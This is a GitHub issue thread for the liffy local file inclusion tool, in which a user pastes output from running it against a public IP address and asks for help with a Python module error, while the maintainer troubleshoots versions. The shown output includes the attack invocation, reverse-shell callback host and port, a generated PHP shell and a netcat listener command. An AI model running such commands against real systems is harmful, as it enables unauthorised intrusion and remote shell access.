liffy.py
I'm execute this command
python3 liffy.py http://206.209.126.5/includes/header.php?systempath= -d -e -i
Liffy v2.0
[~] Checking Target: 206.209.126.5
[~] Testing with data://
[?] Host For Callbacks: 192.168.1.54
[?] Port For Callbacks: 4444
[~] Generating PHP listener
[+] Success!
[~] listener: /tmp/shell.php
[~] Start your listener by running nc -ntlp 4444
[~] Starting Web Server ...
Traceback (most recent call last):
File "/home/king/liffy/core/server.py", line 11, in
I got The Error No module named socketserver
Please resolve my problem as soon as possiable
what is your python version? Which OS are you running on?
Os is Linux 2021-06-25 SMP Debian 5.10.46-kali
Python version is python 3.9.2
On Thu, 12 Aug 2021, 12:15 am Mehtab Zafar, @.***> wrote:
what is your python version? Which OS are you running on?
— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/mzfr/liffy/issues/18#issuecomment-897064793, or unsubscribe https://github.com/notifications/unsubscribe-auth/AJFTYMXHUZ3GH5CTR4RBWZDT4LAONANCNFSM5B6GSDBA . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&utm_campaign=notification-email .
I just tried it on my system and I didn't get any errors. But I've still replaced the keyword python to python3 in all the subprocess command executions. https://github.com/mzfr/liffy/commit/5866f73a395f3fb46b58ad471813176a6d22e2fe
Even though this wasn't the cause of the error, just try to pull again and then use it.
Also, try it out with a lower version of python like python3.8 and let me know if it works or not.
Hello Mzfr sir,
This Time i'm using python 3.5 version and i got a new error.
python3 liffy.py http://206.209.126.5/includes/header.php?systempath= -d -e -i
| | ()/ |/ | | \ / _ \
| | | || | _ _ __ __ ) || | | |
| | | | | | | | | \ \ / // / | | | |
| || | | | | | || | \ V // / | || |
|||| || _, | _/|()/
/ |
|/
[~] Checking Target: 206.209.126.5
[~] Testing with data://
[?] Host For Callbacks: 192.168.1.54
[?] Port For Callbacks: 3333
[~] Generating PHP listener
[+] Success!
[~] listener: /tmp/shell.php
[~] Start your listener by running nc -ntlp 3333
[~] Starting Web Server ...
Traceback (most recent call last):
File "/home/king/liffy/core/Server.py", line 12, in
Pelease give me a solution of this error?
Can you tell me which os you are using and which python version u r using?
That daemon error is because of the missing python package. Make sure you have installed all the requirements. I am using Ubuntu 20.04 inside WSL with python 3.8.2
Thanks, I'll check it out.
On Thu, 12 Aug 2021, 5:55 pm Mehtab Zafar, @.***> wrote:
That daemon error is because of the missing python package. Make sure you have installed all the requirements. I am using Ubuntu 20.04 inside WSL with python 3.8.2
— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/mzfr/liffy/issues/18#issuecomment-897596586, or unsubscribe https://github.com/notifications/unsubscribe-auth/AJFTYMSAKEGA524IJ6WQ25DT4O4VPANCNFSM5B6GSDBA . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&utm_campaign=notification-email .
Feel free to open it again if you still facing the issue,